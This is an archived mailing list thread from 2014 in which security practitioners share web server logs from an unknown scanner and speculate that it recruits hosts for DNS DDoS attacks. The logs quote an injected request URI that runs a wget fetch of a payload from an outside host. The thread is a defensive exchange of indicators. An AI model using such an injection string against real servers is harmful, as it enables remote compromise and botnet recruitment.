PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?

From: xgermx <xgermx () gmail com>
Date: Mon, 28 Jul 2014 11:03:41 -0400

Seeing hits from 16X.XXX.XX.X7
Based on the name, I'd have to guess reflective DNS DDoS
Registrant phone for proxypipe.com is +1.8557769900 which actually works
and an IVR picks up :) I selected option 2 for tech support to complain
that the other kidz are laughing at my lame apache 0day but, my call was
shunted.

xgermx


On Mon, Jul 28, 2014 at 10:30 AM, Frank Michael <frankcmichael () gmail com>
wrote:

Various sources confirming the same thing for other sites. All on 7/28.
Keep an eye open.

On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:

I've got a site that was scanned this morning by a tool that left these
entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%
20proxypipe.com/apach0day;

Anyone recognise it? That user agent isn't coming up in google searches.

Robin

_______________________________________________

Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com


_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Current thread:

Re: [Security Weekly] apache chroot 0day?, (continued)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
  - Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
    - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)